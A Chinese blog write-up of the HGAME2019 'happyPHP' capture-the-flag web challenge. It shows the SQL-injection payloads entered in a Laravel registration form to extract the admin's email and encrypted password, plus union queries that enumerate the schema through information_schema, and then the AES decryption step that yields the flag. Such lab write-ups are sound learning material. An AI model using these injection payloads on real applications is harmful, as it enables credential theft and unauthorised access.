HGAME2019 WEB happyPHP

最新推荐文章于 2024-05-16 17:47:49 发布
最新推荐文章于 2024-05-16 17:47:49 发布
阅读量1.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stepone4ward/article/details/88019100
版权

虽然比赛已经结束了,但是不会的题目还是要及时学习的,题目直接给出了提示是使用Laravel框架进行编写的,刚开始接触这道题目的时候,一直在百度Laravel框架的漏洞,甚至没有去尝试用户注册和登陆也就没有得到源码了。。。
f12查看元素
在这里插入图片描述
得到作者在github上留下的源码,在SessionsController.php中得到关键的注入语句
在这里插入图片描述
尝试在登陆界面进行注入获取admin的邮箱,payload:name=qwert12345' union select email from 'users' where 'name'='admin,密码邮箱随意,完成注册后登陆,得到admin的邮箱:admin@hgame.com(注意符号)。同理修改payload为name=qwert12345' union select password from 'users' where 'name'='admin,密码邮箱随意,得到password:eyJpdiI6InJuVnJxZkN2ZkpnbnZTVGk5ejdLTHc9PSIsInZhbHVlIjoiRWFSXC80ZmxkT0dQMUdcL2FESzhlOHUxQWxkbXhsK3lCM3Mra0JBYW9Qb2RzPSIsIm1hYyI6IjU2ZTJiMzNlY2QyODI4ZmU2ZjQxN2M3ZTk4ZTlhNTg4YzA5N2YwODM0OTllMGNjNzIzN2JjMjc3NDFlODI5YWYifQ==
ps:如果一开始就使用最原始的union查询语句也是可以的,-1‘union select database()#获得数据库名为hgame-1’union select table_name from information_schema where table_schema=database()#获得表名为users-1‘union select column_name from inforamtion_schema.columns where table_name='users'获得列名的前三项分别为id,emailpassword,以id=1进行邮箱和密码查询也可以得到相同的结果。
在这里插入图片描述
但此时使用上述的邮箱密码进行登陆时并不能成功。看了wp之后才知道在config当中对密码进行了AES-256-CBC,key存在于.env文件当中,解密后得到密码password:9pqfPIer0Ir9UUfR,登陆后得到flag。

GAPPPPP
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hgame
忙碌者的博客
02-06 5207
Hgame WEEK1 1.换头大作战 题目地址 题目首先是这样一个界面,既然让我提交,那自然要提交试试,随便填个1进去提交试试。 提交完提示: request method is error.I think POST is better 既然让我POST,果断调出HACKBAR,同时注意到url后面多了个want变量,自然想到去POST这个want。 构造want=1,RUN,得到下图:需要lo...
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
我对HGAME的看法(GalGame
大师的资源
02-15 9525
堕落了,居然下载18禁的GalGame顺便谈谈我对 HGAME的看法HGAME,我也局限于studio e go的游戏更准确地说是18禁的GalGame(美少女游戏)看看网上:切随便找个 GAL 游戏美女都多的要不成 GAL全是H的 日本游戏没H的少死了 在日本大家都玩PS PC游戏市场都被H的占领了 所以PC游戏就是HGAME 想玩HGAME 就说嘛(http://zhidao.baid
hgame是什么?【详解】 【我们不能光玩game,而不了解game的文化】
FreeXploiT
05-15 1万+
allyesno:今天偶闻hgame资深人士swan对hgame的言论 [12:23] 最开始的那种游戏,出现图片的时候你要按h键才能往下显示[12:24] 后来就用h-game代替了[12:24] 然后发展到hentai[12:24] 这个是日文变态的意思~嘿嘿,不过是现有h才有hentai的下面我们来看看一篇更详细的说明 希望对大家以后提高玩hgame的水平有帮助H-gam
本世纪最经典好文---新系统下经典老游戏[中文HGAME]重玩全攻略(感谢作者)
热门推荐
lanji1988的专栏
04-10 3万+
送给所有爱玩游戏的老鸟们 老游戏中有大量经典作品,其中中文的HGAME更是经典中的经典! ◆ 告别的年代 失色的回忆?——新系统下经典老游戏重玩全攻略 ◆  “新”与“老”当然是相对的,不过在开篇之前有必要确定我们的讨论范畴,这里的“老”是指为Win98之前的操作系统,包括DOS和Win32/95,而新系统则是指Win98/2000/XP。毫无疑问,有很多老游戏都很值得我们来重温,但重
HGAME2021 - 梦的开始
anwen12的博客
03-01 2202
HGAME2021 - 梦的开始 WEB 0x01 200OK! 参考链接:https://blog.csdn.net/anwen12/article/details/113728065 0x02 LazyDogR4U 一个简单的代码审计类的问题 这是提示 这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。 0x03 LIKI的生日礼物 题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
0hgame:用0h制作的游戏->阅读README
05-01
0h游戏卡纸我在2014年10月26日凌晨02:00开始了这个项目,并在2014年10月26日凌晨02:00完成了该项目。 没有时间的游戏? 是的! 好好享受! (对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club...
html5game.co.kr:添加基本​​文件
07-01
HTML5游戏开发是一个充满活力的领域,特别是在JavaScript的加持下,开发者可以构建出跨平台、交互性强的游戏。... ... ...它是一门轻量级的脚本语言,易于学习且支持事件驱动和函数式编程。...开发者可以通过DOM(文档对象模型...
HGAME 2023 Week1
ph0ebus的博客
01-13 2253
Week1的大多数题对我这样的萌新还是很友好的,虽然但是还是很多没解出来,不过还是学到了蛮多东西,浅浅记录一下。
CTF-RE-わかります(hgame2018)
SuperGate的博客
01-27 2208
Hgame week1里面应该说是最难的一个题。 主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位,v7则是后4位,这里的位是二进制位。 然后分别将两个dword_6021xx数组找出来,点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。 其中v9生成函数比较容易求出v9,v...
hgame2023-week3
247533的博客
02-01 873
过年 打麻将 摆烂。
HGAME2021-week1-wp
qq_50438521的博客
02-07 5406
HGAME2021-week1-wp 1. Web_watermelon 链接:http://watermelon.ryen.xyz:800/ 本题是一个合成大西瓜的小游戏,过2000分拿到flag。 打开这个界面我人都是懵的,这是啥??下面的堆积的界面完全看不到,然后我就瞎子摸象,玩了不下五次,没有一次超过300分。真的!!!作为一个游戏黑洞,加上我从来没玩过它,让我不作弊是不可能的。 所以在火狐浏览器中找到web开发者,在查看器中更改界面,把红线提高,要让红线高就要让界面窄一点,深一点。 (如图所示)
HGAME部分wp只玩了前两周
qq_49354488的博客
03-11 1060
第一周 MISC Base全家福 新年即将来临之际,Base家族也团聚了,他们用他们特有的打招呼方式向你问了个好,你知道他们在说什么吗? R1k0RE1OWldHRTNFSU5SVkc1QkRLTlpXR1VaVENOUlRHTVlETVJCV0dVMlVNTlpVR01ZREtSUlVIQTJET01aVUdSQ0RHTVpWSVlaVEVNWlFHTVpER01KWElRPT09PT09 解密base64 解密base32 16转字符串 hgame{We1c0me_t0_HG4M3_2021}
HGAME-week2-web-wp
静仙的博客
02-18 3400
web萌新的ctf之旅
HGAME 2024 WEEK2 Web方向题解 全_what the cow say (2)
2301_76223496的博客
04-15 1051
可参考的弱密码字典:https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/top1000.txt。真能搜到,Go的SSTI危害比较小,能用的基本上只有XSS。请本地打通再尝试远程环境;感觉好像SSTI,又说flag在bot手上,怀疑是XSS。我之前生成pickle那个引用了os包,可能环境没有,换个脚本。函数,无需重复创建)(反弹shell失败了,尝试DNS带出flag)注意,pickle,版本要一致,版本是311。
HGAME 2022 Writeup
m0_67400973的博客
03-08 2509
文章目录 Level - Week1 WEB easy_auth 蛛蛛…嘿嘿?我的蛛蛛 Tetris plus Fujiwara Tofu Shop MISC 欢迎欢迎!热烈欢迎! 这个压缩包有点麻烦 好康的流量 群青(其实是幽灵东京) CRYPTO Dancing Line Matryoshka English Novel Level - Week2 WEB Apache! webpack-engine At0m的留言板 一本单词书 Pokemon MISC
HGAME 2024 WEEK2 Web方向题解 全_what the cow say
最新发布
2301_82056337的博客
05-16 396
/获取cookie(flag)window.open(“http://”+a+“.kbqsag.ceye.io”);}}{{else}}{{end}} go中的if-else语法类似,条件选择。“text/template” // 用于处理文本模板,存在XSS!setTimeout(function(){ //延时1s执行。
堆溢出漏洞利用: EldenRingFinal 中的_hgame2024_off_by_one攻击
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值